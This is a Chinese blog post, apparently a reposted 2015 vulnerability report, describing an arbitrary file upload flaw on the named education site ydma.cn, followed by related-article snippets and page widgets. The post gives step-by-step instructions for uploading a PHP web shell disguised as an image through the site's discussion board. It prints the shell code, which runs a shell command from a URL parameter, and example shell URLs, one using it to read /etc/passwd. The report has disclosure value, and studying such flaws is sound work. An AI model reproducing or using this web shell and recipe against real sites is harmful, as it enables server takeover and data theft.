【漏洞学习——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞

最新推荐文章于 2025-09-05 14:33:13 发布
原创 最新推荐文章于 2025-09-05 14:33:13 发布 · 463 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在YDMA网站上发现的一个安全漏洞,通过特定步骤,用户可以上传包含恶意代码的图片,潜在地允许远程代码执行。此漏洞利用了网站的图片上传功能,通过上传包含PHP代码的图片文件,攻击者可能获取服务器权限。

漏洞细节

输入网址:http://www.ydma.cn/ 
1、随意注册一个账号
2、购买任意免费课程
3、进入该课程的讨论区
4、点击发表话题,点击上传图片。

<?php
	$x = shell_exec($_GET['XX']);
	var_dump($x);
?>

复制返回地址到浏览器打开。
例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.php
or :http://www.ydma.cn/files/image/2015/11-18/1889937821564c46536c47e.php?XX=cat%20/etc/passwd
======================
我只是友情测试漏洞,并未深入

参见:https://bugs.shuimugan.com/bug/view?bug_no=154170

 

任意文件上传
m0_56578216的博客
08-31 299
文件上传是Web 应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞。如果服务器配置不当或没有进行足够的对文件的验证和过滤(根据后缀名、内容、类型检测过滤),导致用户可以上传任意文件,包括恶意的脚本文件,这就是任意文件上传漏洞
LAMP兄弟连Linux课件.ppt
12-29
Linux 应用与发展
一文吃透文件上传漏洞!路径遍历、后缀绕过、ZIP炸弹全解析
最新发布
2301_79455190的博客
09-05 764
检查项防护内容路径合法性检查防止 ZIP 路径穿越攻击文件数上限防止上传含成千上万小文件的压缩包单文件大小限制防止解压出超大单个文件总解压体积限制阻止总体积膨胀的 ZIP 炸弹🧨攻击点🎯攻击方式🛡防御建议路径控制- 路径穿越../- 绝对路径注入 - 上传符号链接- 使用规范化路径 - 校验目标路径是否在允许目录内 - 禁止软链接上传文件类型绕过- 双扩展.php.jpg- 特殊字符- 控制字符/Unicode 后缀绕过 - 魔术头伪装。
文件任意上传
一个普普通通的博客
03-15 1282
文件上传任意上传
[LAMP兄弟连]HTML5视频教程(12集)
07-22
教程名称: [LAMP兄弟连]HTML 5视频教程(12集)【】[LAMP兄弟连]HTML 5视频教程-1【】[LAMP兄弟连]HTML 5视频教程-2【】[LAMP兄弟连]HTML 5视频教程-3【】[LAMP兄弟连]HTML 5视频教程-4【】[LAMP兄弟连]HTML 5视频...
Lamp兄弟连细说PHP全部课件和代码
05-27
Lamp兄弟连细说PHP】是一门针对初学者和进阶者的PHP编程课程,旨在全面讲解PHP在LAMP(Linux、Apache、MySQL、PHP)环境下的应用与开发。这门课程涵盖了从基础语法到高级特性的广泛内容,旨在帮助学习者掌握PHP...
LAMP兄弟连教学课件
10-28
**LAMP兄弟连教学课件**是一套针对初学者和进阶者精心设计的课程资料,专注于PHP web开发。LAMP是Linux、Apache、MySQL和PHP的缩写,这是一个广泛用于构建动态网站和Web应用程序的技术栈。这个压缩包包含了一系列PDF...
LAMP兄弟连—职业素质培训视频教程
07-22
教程名称:LAMP兄弟连—职业素质培训视频教程课程目录:【】第1讲 积极的心态(上)【】第1讲 积极的心态(下)【】第3讲 简历技巧(上)【】第3讲 简历技巧(下)【】第4讲 面试技巧(上)【】第4讲 面试技巧(下)...
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
4.任意文件上传
qq_45926195的博客
10-29 1274
4.1什么是任意文件上传 大多数网站都有文件上传的接口,但如果在后台开发时并没有对上传文件进行安全考虑或采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件,从而通过该恶意文件的访问来控制整个后台 4.2文件上传的绕过方式 一般分为客户端和服务端 客户端是js绕过 用burpsuite抓个包改一下扩展名试一下,服务端绕过分为检查后缀,检查内容,和其他绕过。检查后缀主要是黑名单和白名单绕过 ,黑名单的话 ,上传特殊解析后缀、后缀大小写绕过、点绕过、空格绕过、::$DATA绕.
22-任意文件上传-(一)
XLbb的博客
05-10 1631
一、概述 任意文件上传(Arbitrary File Upload)是一种网络安全漏洞漏洞源于应用程序对用户上传文件的不当处理。当系统未能正确验证文件类型、内容或路径时,攻击者便有机可乘,上传携带恶意代码文件,如Webshell,进而执行任意命令、窃取数据或发起进一步攻击。 二、使用pikachu靶场环境学习测试 1、客户端前端校验(client check): 三、upload-labs靶场环境测试学习
dedecms后台文件任意上传漏洞(media_add.php)
L_melody的博客
01-19 2311
文件:media_add.php 路径:.../dede/media_add.php 解决方案: 查找文件位置:/dede/media_add.php,大概在69行左右,找到: $fullfilename = $cfg_basedir.$filename; 修改为: if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php...
dedecms 漏洞_源起网——dedecms后台文件任意上传漏洞
weixin_39722917的博客
11-29 272
源起网 - 做专业.全面的网站源码模板下载站!​source.aiconvert.cn漏洞dedecms后台文件任意上传漏洞简介dedecms早期版本后台存在大量的富文本编辑器,该控件提供了一些文件上传接口,同时dedecms对上传文件的后缀类型未进行严格的限制,这导致了黑客可以上传WEBSHELL,获取网站后台权限。文件/dede/media_add.php修复打开 /dede/media_ad...
Tomcat任意文件上传(CVE-2017-12615)
m0_73720136的博客
05-07 1786
掌握文件上传中的Tomcat任意文件上传(CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
任意文件上传和下载
2301_79194110的博客
09-20 837
http://10.0.0.130:91/upload/upload/202309121802212705.php3 不能解析。右键复制图片地址http://10.0.0.130:91/upload/upload/3820230913144850.jpg。访问tj.php http://192.168.134.1:90/upload/upload/tj.php。http://10.0.0.130:91/upload/upload/hao.jpg 会被解析为php。
文件上传漏洞
热门推荐
MzHeader的博客
03-04 2万+
文件上传漏洞 文件上传漏洞是指由于程序员未对上传文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 在了解文件上传漏洞之前先了解什么...
LAMP兄弟连李明老师详解Linux文件系统管理与硬盘分区实战
本篇文档是[LAMP兄弟连李明老师讲Linux]课程的第9讲,专注于Linux文件系统管理。课程涵盖了多个关键知识点,包括Linux文件系统的构成及其命令、硬盘分区及管理、磁盘配额、备份与恢复等内容。 首先,讲解了Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值